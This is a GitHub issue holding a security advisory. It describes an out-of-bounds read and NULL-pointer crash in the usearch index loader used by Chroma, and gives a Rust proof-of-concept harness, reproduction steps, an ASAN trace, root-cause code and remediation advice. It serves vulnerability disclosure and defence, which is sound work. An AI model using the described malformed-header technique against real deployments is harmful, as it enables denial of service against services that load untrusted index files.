
[Bug]: usearch Out-of-Bounds Read via Malicious Index File #7002

@raefko

What happened?

usearch Out-of-Bounds Read via Malicious Index File

Author(s): Nabih — Fuzzing Labs (nabih@fuzzinglabs.com)
Date: 2026-05-01


Executive Summary

A maliciously crafted usearch index file can trigger an out-of-bounds memory read, leading to a NULL pointer dereference and a deterministic application crash (Denial of Service) when the file is loaded and then searched by Chroma. The root cause is that the serialized index format stores matrix_rows (node count) and matrix_cols (bytes per vector) as untrusted 32-bit fields. usearch's load_from_stream accepts these values verbatim, with no cross-validation against the caller-supplied IndexOptions, which leaves vectors_lookup_ entries NULL. A subsequent search call passes that NULL pointer as the b_scalars argument to the NEON SIMD dot-product kernel, which immediately faults on the zero page.

ASAN confirms the crash (PID 63499): x[1] = 0x0000000000000000 is the NULL b_scalars pointer; x[0] = 0x0000602000000130 is the valid query vector (a_scalars); x[2] = 0x2 is count_scalars (dims = 2). The crash is deterministic and reproduces on every run against the provided artifact.


Vulnerability Details

  • Severity: High (CVSS 7.5 — AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
  • CWE: CWE-125 (Out-of-Bounds Read), CWE-476 (NULL Pointer Dereference), CWE-20 (Improper Input Validation)
  • Affected Component: usearch C++ library (include/usearch/index_dense.hpp, function load_from_stream()); crash site: simsimd_dot_f32_neon() at offset +0x14c within the function

| Component | Version | Notes |
| --- | --- | --- |
| chroma-index (Rust crate) | All versions using the usearch feature | Direct consumer of usearch::Index::load_from_buffer |
| usearch (Rust bindings + C++ library) | = 2.23 (pinned) | Root cause in the C++ library |
| unum-cloud/usearch (upstream C++) | v2.x (confirmed) | include/usearch/index_dense.hpp, load_from_stream |
| simsimd (transitive dependency) | 6.x | Crash site: simsimd_dot_f32_neon |

Environment

  • Distro Version: macOS/AArch64 (Apple M-series)
  • Additional Details: chroma-core/chroma repository — rust/index/fuzz/ crate; usearch 2.23 pinned in Cargo.toml

Steps to Reproduce

  1. Clone the Chroma repository and enter the fuzz crate:
    git clone https://github.com/chroma-core/chroma
    cd chroma/rust/index/fuzz
  2. Build with ASAN: RUSTFLAGS="-Zsanitizer=address" cargo +nightly build --bin poc_asan_test --target aarch64-apple-darwin
  3. Run against the provided crash artifact:
    ./target/aarch64-apple-darwin/debug/poc_asan_test \
        artifacts/fuzz_load_from_buffer/crash-1434c73f8820300eb2302038c4a4c557f4f172b9 \
        2

Proof of Concept

use usearch::{Index, IndexOptions, MetricKind, ScalarKind};

fn main() {
    let args: Vec<String> = std::env::args().collect();
    if args.len() < 2 {
        eprintln!("Usage: {} <crafted_binary> [dims] [metric]", args[0]);
        std::process::exit(1);
    }

    let path = &args[1];
    let dims: usize = args.get(2).and_then(|s| s.parse().ok()).unwrap_or(8);
    let metric = match args.get(3).map(|s| s.as_str()) {
        Some("cos") => MetricKind::Cos,
        Some("l2") => MetricKind::L2sq,
        _ => MetricKind::IP,
    };

    let data = std::fs::read(path).unwrap_or_else(|e| {
        eprintln!("Failed to read {}: {}", path, e);
        std::process::exit(1);
    });

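    // The first 8 bytes are matrix_rows and matrix_cols (u32 little-endian).
    if data.len() < 8 {
        eprintln!("{} is too short to contain the 8-byte header", path);
        std::process::exit(1);
    }
    let node_count = u32::from_le_bytes(data[0..4].try_into().unwrap());
    let byte_size  = u32::from_le_bytes(data[4..8].try_into().unwrap());
    println!("Header: node_count={}, byte_size={}", node_count, byte_size);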

    let options = IndexOptions {
        dimensions: dims,
        metric,
        quantization: ScalarKind::F32,
        connectivity: 32,
        expansion_add: 128,
        expansion_search: 64,
        multi: false,
    };

    let index = Index::new(&options).unwrap();

    println!("Calling load_from_buffer...");
    match index.load_from_buffer(&data) {
        Ok(_) => {
            println!("Loaded OK: size={}, capacity={}", index.size(), index.capacity());
            let query = vec![1.0f32; dims];
            println!("Calling search({} dims, k=10)...", dims);
            match index.search(&query, 10) {        // <-- CRASH: b_scalars=NULL in SIMD kernel
                Ok(r) => println!("Search OK: {} results", r.keys.len()),
                Err(e) => println!("Search error: {}", e),
            }
        }
        Err(e) => println!("Load failed: {}", e),
    }
}

Root Cause Analysis

The serialized usearch dense index format begins with two attacker-controlled 32-bit fields:

Offset  0..3   : matrix_rows (u32 LE), number of stored vectors
Offset  4..7   : matrix_cols (u32 LE), bytes per vector (dims × sizeof(scalar))
Offset  8..N-1 : raw vector data, matrix_rows × matrix_cols bytes (N = 8 + matrix_rows × matrix_cols)
Offset  N..    : "usearch" magic + HNSW header + graph adjacency data
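The layout above can be read with a few lines of Rust. This is a minimal sketch, assuming the header is exactly two little-endian u32 fields followed immediately by the vector block, and that the "usearch" magic starts at offset N as described; `MatrixHeader` and `parse_matrix_header` are hypothetical names, not part of the usearch API. The product is computed in u64, where two u32 values can never wrap.

```rust
use std::convert::TryInto;

/// Hypothetical view of the 8-byte matrix header described above.
#[derive(Debug, PartialEq)]
struct MatrixHeader {
    matrix_rows: u32, // number of stored vectors (untrusted)
    matrix_cols: u32, // bytes per vector (untrusted)
    vectors_end: u64, // N = 8 + matrix_rows * matrix_cols
}

/// Reads the two little-endian u32 fields and computes where the vector
/// block should end. Returns None if the buffer is shorter than 8 bytes.
fn parse_matrix_header(data: &[u8]) -> Option<MatrixHeader> {
    let rows = u32::from_le_bytes(data.get(0..4)?.try_into().ok()?);
    let cols = u32::from_le_bytes(data.get(4..8)?.try_into().ok()?);
    // Widen before multiplying: u32 * u32 can wrap in u32 but always fits
    // in u64, and so does adding the 8-byte header.
    let vectors_end = 8 + u64::from(rows) * u64::from(cols);
    Some(MatrixHeader { matrix_rows: rows, matrix_cols: cols, vectors_end })
}

fn main() {
    // Synthetic buffer: 2 vectors of 8 bytes (dims = 2, f32), then the magic.
    let mut buf = Vec::new();
    buf.extend_from_slice(&2u32.to_le_bytes());
    buf.extend_from_slice(&8u32.to_le_bytes());
    buf.extend_from_slice(&[0u8; 16]);
    buf.extend_from_slice(b"usearch");

    let header = parse_matrix_header(&buf).expect("buffer has an 8-byte header");
    println!("{:?}", header);

    // Under the assumed layout, the magic must start exactly at offset N.
    let n = header.vectors_end as usize;
    let magic_ok = buf.get(n..n + 7) == Some(&b"usearch"[..]);
    println!("magic at N: {}", magic_ok);
}
```

A header whose N does not land on the magic is already a strong signal that matrix_rows or matrix_cols has been tampered with.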

Inside index_dense.hpp (~line 1101), load_from_stream reads these fields and uses them directly:

std::uint32_t dimensions[2];
input(&dimensions, sizeof(dimensions));
matrix_rows = dimensions[0];   // attacker-controlled
matrix_cols = dimensions[1];   // attacker-controlled

vectors_lookup_ = vectors_lookup_t(matrix_rows);

for (std::uint64_t slot = 0; slot != matrix_rows; ++slot) {
    byte_t* vector = vectors_tape_allocator_.allocate(matrix_cols);
    input(vector, matrix_cols);
    vectors_lookup_[slot] = vector;    // stores raw pointer — may be NULL if matrix_cols=0
}

Neither field is validated against metric_.bytes_per_vector() or the actual buffer length. When matrix_cols is inconsistent with the graph section that follows, vectors_lookup_ entries end up NULL. During search, the metric proxy fetches the stored pointer by graph-node slot and passes it as b_scalars to the SIMD kernel. ASAN confirms this pointer is 0x0 at x[1], causing a READ fault on the zero page inside simsimd_dot_f32_neon.
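To make the failure mode concrete, the sketch below models the stored vectors as slices borrowed from the loaded buffer instead of raw pointers. It is an illustration under stated assumptions, not usearch's code: `StoredVectors`, `vector_for_slot` and `dot_f32` are hypothetical, the vector block is assumed to start at offset 8, and `expected_bytes` stands in for metric_.bytes_per_vector(). A graph slot beyond the stored rows, a row whose width disagrees with the metric (including matrix_cols = 0), or a row that runs past the buffer yields `None` instead of a pointer handed to the dot-product kernel.

```rust
/// Hypothetical bounds-checked model of `vectors_lookup_`: instead of raw
/// pointers, each row is a slice borrowed from the loaded buffer.
struct StoredVectors<'a> {
    data: &'a [u8],        // the whole serialized buffer
    matrix_rows: usize,    // from the untrusted header
    matrix_cols: usize,    // from the untrusted header
    expected_bytes: usize, // stand-in for metric_.bytes_per_vector()
}

impl<'a> StoredVectors<'a> {
    /// Returns the stored row for a graph slot, or None if it cannot be valid.
    fn vector_for_slot(&self, slot: usize) -> Option<&'a [u8]> {
        // Reject rows whose width disagrees with the metric (including 0)
        // and slots beyond the number of rows the header claims.
        if self.matrix_cols != self.expected_bytes || slot >= self.matrix_rows {
            return None;
        }
        // Row starts at 8 + slot * matrix_cols; checked to avoid wrapping.
        let start = slot.checked_mul(self.matrix_cols)?.checked_add(8)?;
        let end = start.checked_add(self.matrix_cols)?;
        let data: &'a [u8] = self.data;
        data.get(start..end) // None if the row runs past the buffer
    }
}

/// Scalar dot product between a query and a row of little-endian f32 bytes.
fn dot_f32(query: &[f32], row: &[u8]) -> f32 {
    row.chunks_exact(4)
        .map(|c| f32::from_le_bytes([c[0], c[1], c[2], c[3]]))
        .zip(query)
        .map(|(b, a)| a * b)
        .sum()
}

fn main() {
    // Buffer holds exactly one 2-dim f32 row, but the graph may name more slots.
    let mut buf = Vec::new();
    buf.extend_from_slice(&1u32.to_le_bytes());
    buf.extend_from_slice(&8u32.to_le_bytes());
    buf.extend_from_slice(&1.5f32.to_le_bytes());
    buf.extend_from_slice(&2.0f32.to_le_bytes());

    let vectors = StoredVectors { data: &buf, matrix_rows: 1, matrix_cols: 8, expected_bytes: 8 };
    let query = [1.0f32, 1.0];
    for slot in 0..3 {
        match vectors.vector_for_slot(slot) {
            Some(row) => println!("slot {}: dot = {}", slot, dot_f32(&query, row)),
            None => println!("slot {}: rejected instead of dereferenced", slot),
        }
    }
}
```

The same per-slot bound (8 + slot × matrix_cols + matrix_cols within the buffer) is the check that the memory-mapped view path would also need.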


Detailed Behavior

load_from_buffer returns Ok(()) and the index reports size=16, capacity=16, so it appears healthy. The crash occurs only on the first search call, so a successful load says nothing about whether the file is safe: the load boundary cannot serve as a detection point.

RUSTFLAGS="-Zsanitizer=address" cargo +nightly build \
    --bin poc_asan_test --target aarch64-apple-darwin && \
./target/aarch64-apple-darwin/debug/poc_asan_test \
    artifacts/fuzz_load_from_buffer/crash-1434c73f8820300eb2302038c4a4c557f4f172b9 \
    2
AddressSanitizer:DEADLYSIGNAL
=================================================================
==63499==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000104d02450 bp 0x00016b11be30 sp 0x00016b11be20 T0)
==63499==The signal is caused by a READ memory access.
==63499==Hint: address points to the zero page.
    #0 0x000104d02450 in simsimd_dot_f32_neon(float const*, float const*, unsigned long long, double*)+0x14c (poc_asan_test:arm64+0x100022450)
    #1 0x000104cf94e4 in bool unum::usearch::index_gt<...>::search_to_find_in_base_<...>(...) const+0x454 (poc_asan_test:arm64+0x1000194e4)
    #2 0x000104cf8dfc in unum::usearch::index_gt<...>::search_result_t unum::usearch::index_gt<...>::search<...>(...) const+0x1ac (poc_asan_test:arm64+0x100018dfc)
    #3 0x000104cf8be4 in unum::usearch::index_dense_gt<...>::search_result_t unum::usearch::index_dense_gt<...>::search_<float, ...>(...) const+0xdc (poc_asan_test:arm64+0x100018be4)
    #4 0x000104cf1958 in Matches search_<float>(...)+0x180 (poc_asan_test:arm64+0x100011958)
    #5 0x000104cf17c0 in NativeIndex::search_f32(rust::cxxbridge1::Slice<float const>, unsigned long) const+0x50 (poc_asan_test:arm64+0x1000117c0)
    #6 0x000104cf122c in cxxbridge1$194$NativeIndex$search_f32+0x18 (poc_asan_test:arm64+0x10001122c)
    #7 0x000104cec72c in usearch::ffi::NativeIndex::search_f32::hf7202973838dba99+0x1f4 (poc_asan_test:arm64+0x10000c72c)
    #8 0x000104ceb930 in _$LT$f32$u20$as$u20$usearch..VectorType$GT$::search::h252537b2eebe9ad0+0x44 (poc_asan_test:arm64+0x10000b930)
    #9 0x000104ceb5ec in usearch::Index::search::h950c1e77d154d0b2 lib.rs:1144
   #10 0x000104ce5dc4 in poc_asan_test::main::h6b9971fd57940859 poc_asan_test.rs:68
   #11 0x000104ce0f94 in core::ops::function::FnOnce::call_once::hdb553c66484e4abe function.rs:250
   #12 0x000104ce7f34 in std::sys::backtrace::__rust_begin_short_backtrace::h0fa6ff76a94e7bea backtrace.rs:158
   #13 0x000104ce6d78 in std::rt::lang_start::{{closure}}::h845c899ffc3a2359 rt.rs:206
   #14 0x000104d24e50 in std::rt::lang_start_internal::h5feb7ac2538e01ae+0x3fc (poc_asan_test:arm64+0x100044e50)
   #15 0x000104ce6cac in std::rt::lang_start::h855a994d46e40637 rt.rs:205
   #16 0x000104ce6518 in main+0x20 (poc_asan_test:arm64+0x100006518)

==63499==Register values:
 x[0] = 0x0000602000000130   x[1] = 0x0000000000000000   x[2] = 0x0000000000000002   x[3] = 0x000000016b11be28
 x[4] = 0x0000612000000240   x[5] = 0x0000000000000001  x[19] = 0x000061d000000080  x[20] = 0x0000000000000040
x[24] = 0x0000614000000040  x[25] = 0x0000000000000100  x[26] = 0x000061d0000000b0

SUMMARY: AddressSanitizer: SEGV (poc_asan_test:arm64+0x100022450) in simsimd_dot_f32_neon(float const*, float const*, unsigned long long, double*)+0x14c
==63499==ABORTING

The register dump maps directly onto the SIMD kernel's AArch64 calling convention:

  • x[0] = 0x0000602000000130 (a_scalars): the query vector, heap-allocated and valid
  • x[1] = 0x0000000000000000 (b_scalars): the stored-vector pointer from vectors_lookup_[slot], NULL due to the corrupted header; this is the faulting address
  • x[2] = 0x2 (count_scalars): 2, matching the dims=2 argument passed to the PoC

The fault is a READ at address 0x0, i.e. at offset 0 from b_scalars, on the kernel's first access to the stored vector inside simsimd_dot_f32_neon. The crash is fully deterministic. No write occurs and the faulting address is always NULL, so this is a pure read at a fixed address.


Recommendations

  1. Short-term (Chroma-side): Add a validation wrapper around load_from_buffer in chroma-index before forwarding to usearch. Verify that matrix_cols == expected_dims * scalar_bytes and that 8 + matrix_rows * matrix_cols <= data.len(), computing the product in 64-bit arithmetic so it cannot wrap. Return a ChromaError on any violation.
  2. Long-term (upstream usearch): Fix load_from_stream in include/usearch/index_dense.hpp to reject any buffer where matrix_cols != metric_.bytes_per_vector(). Apply the same check to the view (memory-mapped) path where matrix_cols * slot can reference memory outside the mapped region.
  3. Defense-in-depth: Apply integrity verification (HMAC or content-hash) to index files stored in object storage before loading. Consider running the index-loading worker in a sandboxed subprocess (e.g., seccomp) to contain crashes. Enable ASAN in CI fuzz runs to catch regressions.
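Recommendation 1 can be sketched as a pure pre-check that runs before the bytes reach usearch's Index::load_from_buffer. This is a minimal sketch assuming the header layout from the root-cause section; `validate_index_buffer` and `HeaderError` are hypothetical names, `scalar_bytes` is 4 for ScalarKind::F32, and the conversion into Chroma's ChromaError is left out because that type's shape is not shown in this report. It only checks the matrix header, not the HNSW graph section that follows.

```rust
use std::convert::TryInto;

/// Hypothetical error type; a real wrapper would map this into ChromaError.
#[derive(Debug, PartialEq)]
enum HeaderError {
    TooShort,
    WrongVectorWidth { found: u32, expected: u64 },
    Truncated { needed: u64, available: u64 },
}

/// Compares the untrusted header with the caller's options before the
/// buffer is handed to usearch.
fn validate_index_buffer(data: &[u8], dims: usize, scalar_bytes: usize) -> Result<(), HeaderError> {
    if data.len() < 8 {
        return Err(HeaderError::TooShort);
    }
    let rows = u32::from_le_bytes(data[0..4].try_into().unwrap());
    let cols = u32::from_le_bytes(data[4..8].try_into().unwrap());

    // matrix_cols == expected_dims * scalar_bytes
    let expected = (dims as u64).saturating_mul(scalar_bytes as u64);
    if u64::from(cols) != expected {
        return Err(HeaderError::WrongVectorWidth { found: cols, expected });
    }

    // 8 + matrix_rows * matrix_cols <= data.len(), evaluated in u64 so the
    // product of two u32 values cannot wrap.
    let needed = 8 + u64::from(rows) * u64::from(cols);
    let available = data.len() as u64;
    if needed > available {
        return Err(HeaderError::Truncated { needed, available });
    }
    Ok(())
}

fn main() {
    // Hypothetical crafted header: 16 rows of 0 bytes each.
    let mut crafted = Vec::new();
    crafted.extend_from_slice(&16u32.to_le_bytes());
    crafted.extend_from_slice(&0u32.to_le_bytes());
    // dims = 2 with f32 scalars (4 bytes each), as in the PoC run above.
    println!("{:?}", validate_index_buffer(&crafted, 2, 4));
}
```

In the wrapper, this would run immediately before index.load_from_buffer(&data), returning early on Err so that a malformed file never reaches the C++ loader.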
